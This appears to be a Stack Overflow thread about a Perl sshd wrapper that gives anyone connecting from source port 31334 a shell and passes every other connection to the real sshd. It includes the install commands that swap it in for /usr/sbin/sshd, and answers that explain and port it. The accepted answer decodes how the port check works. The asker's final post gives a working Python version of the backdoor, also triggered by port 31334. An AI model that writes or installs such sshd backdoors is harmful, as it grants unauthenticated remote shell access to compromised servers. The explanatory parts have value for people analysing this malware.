# How to determine the stdin content of this perl script of sshd

Tags: python, perl, ssh, stdin

i'm coding a python3 ssh Middleware according to a perl, and want to add the port determine to my python code. how can i to judge the content about stdin in the perl script ?

the perl script working normally 
i used ubuntu 16.04 , Here is what I did

```
mv /usr/sbin/sshd /usr/bin/sshd
mv /usr/sbin/backdoor /usr/sbin/sshd
chmod +x /usr/sbin/sshd 
systemctl restart sshd
```

this is the perl code

```
#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
```

I understand the STDIN according to the information I found,is it a fd ?

- **POSIX::getpeername allows you to get peername from sockfd. 
  from https://metacpan.org/pod/POSIX::getpeername

so this is my python code

```
#!/usr/bin/python3.5
import os
import socket
import subprocess
import sys

for s in sys.stdin:
    raddr = os.read(s,100)
    if re.match(r'..zf',str(raddr)):
        os.execv("/bin/sh")
        with open("hello.log","a+") as f:
            f.write(str(raddr))
            sys.exit()
os.execv('/usr/bin/sshd',sys.argv)
```

i expect know the meaning of stdin in the perl, thanks ~~

Comment: How do you run the Perl script?

Comment: in the ubuntu, Replace the /usr/sbin/sshd with the perl script, then restart sshd services, so Actually, I don't know how it is running

Comment: It seems it check if standard input is redirected to socket - [Using getpeername with descriptor as 0](https://stackoverflow.com/questions/14611997/using-getpeername-with-descriptor-as-0). So it doesn't read data - os.read() - but it rather need `socket.getpeername()`

Answer (score 1, accepted):

`STDIN` is a filehandle, not a file descriptor ("fd"). File descriptors are small integers that represent I/O channels (such as sockets) in interfaces provided by the OS kernel (["system calls"](https://en.wikipedia.org/wiki/System_call), e.g. `read`, `write`, `open`, ...) at the C level.

`STDIN` ("standard input") is a higher-level object that contains a file descriptor (`0` in the case of `STDIN`) along with other data, e.g. a buffer. You can extract the file descriptor from a handle by using [`fileno`](https://perldoc.pl/functions/fileno). All the usual I/O functions in Perl operate on handles, not raw file descriptors.

Perl's `STDIN` corresponds to [`sys.stdin`](https://docs.python.org/3/library/sys.html#sys.stdin) in Python. As in Perl, the object wraps an underlying file descriptor, which you can extract using `sys.stdin.fileno()` (corresponding to `fileno(STDIN)` in Perl).

[POSIX::getpeername](https://metacpan.org/pod/POSIX::getpeername) is a module on CPAN. It is not what your Perl script is using; otherwise you'd have `use POSIX::getpeername;` somewhere in your code (in fact, the Perl script doesn't load any modules). As the documentation says, this module provides a `_getpeername` function that fetches the remote address from a socket file descriptor; if you wanted to use it with `STDIN`, you'd use `use POSIX::getpeername; POSIX::getpeername::_getpeername(fileno(STDIN))` (or `POSIX::getpeername::_getpeername(0)`).

Your code calls the [`getpeername`](https://perldoc.pl/functions/getpeername) function built into Perl, which takes a file handle, not a descriptor. The handle must refer to a socket. In the case of `STDIN`, it is the calling process that's responsible for setting it up; the Perl code simply assumes that it is a socket. What this function returns is a byte string that contains a raw `struct sockaddr_in` C structure. Normally you'd use [`Socket::unpack_sockaddr_in`](https://perldoc.pl/Socket#($port,-$ip_address)-=-unpack_sockaddr_in-$sockaddr) to extract the port and IP address (or just use one of the higher-level interfaces in [`IO::Socket::INET`](https://perldoc.pl/IO::Socket::INET#METHODS), e.g. `$socket->peerport`).

As for what the regex does, it depends on the internals of `struct sockaddr_in` on the system it's running on. The C type itself is declared as:

```c
struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};
```

`sa_family_t` is [some unsigned integer type](https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/sys_socket.h.html). On Linux (and I expect on other unix systems, too) it is defined as `unsigned short`, i.e. a 2-byte integer.

`in_port_t` is an [unsigned 2-byte integer](https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html) containing the port in network byte order.

Assuming no padding between the first two fields, that means the first two bytes of the string returned by `getpeername` represent the address family and the next two bytes represent the network port in big-endian ("network byte order") format.

This is what `/^..zf/` matches against. The first two bytes can be anything (except for the value 10, which is interpreted as newline; this is likely a bug in the code), so the address family doesn't matter. The string `zf` corresponds to `31334` in big endian:

```sh
$ perl -wE 'say unpack "n", "zf"'
31334
```

In short, `getpeername(...)=~/^..zf/` checks (in a really quick and dirty way) whether the remote port is 31334. If so, the wrapper script runs `/bin/sh`; otherwise it forwards to the real `sshd` executable.

---

I'm not sure what the corresponding Python code would be. Perhaps

```py
import sys
import socket

socket.socket(fileno = sys.stdin.fileno()).getpeername()[1] == 31334
```

?

Comment: thank you !   it works ~ and i paste it in my answer,  you are breathtaking .

Answer (score 1):

`STDIN` is a file descriptor (C terminology), also called a file handle in Perl.
It is usually connected to the keyboard, but if the script is called in a pipe in the terminal, it reads from the pipe. It can also read data from an HTTP POST if the script is a CGI.

Now, the `getpeername` you want is not the one you posted the link, its this one:

https://perldoc.perl.org/functions/getpeername.html

It "returns the packed sockaddr address of the other end of the SOCKET connection", like [furas](https://stackoverflow.com/users/1832058/furas) has pointed out.

Answer (score 1):

Thanks guys , in the end, I implemented my purpose according to the answer of melpomene. This is my code, although there will be a warning  at runtime，but it works~

```
#!/usr/bin/python3.5
import os
import socket
import subprocess
import sys

s = socket.socket(fileno = sys.stdin.fileno())

try:
    n = s.getpeername()
except:
    pass
else:
    raddr = n[1]
    if raddr == 31334:
        subprocess.run(["/bin/sh"])
        #sys.exit()

os.execv('/usr/bin/sshd',sys.argv)
```

and the warning is "*class 'Exception' : [Errno 88] Socket operation on non-socket* ", I am also little confused about this information, I am very happy to listen to some analysis about this.

Considering that someone might be interested in the specific content of stdin on this issue, I paste it below

```
<socket.socket fd=0, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('192.168.8.199', 22), raddr=('192.168.8.240', 31334)>
```

~~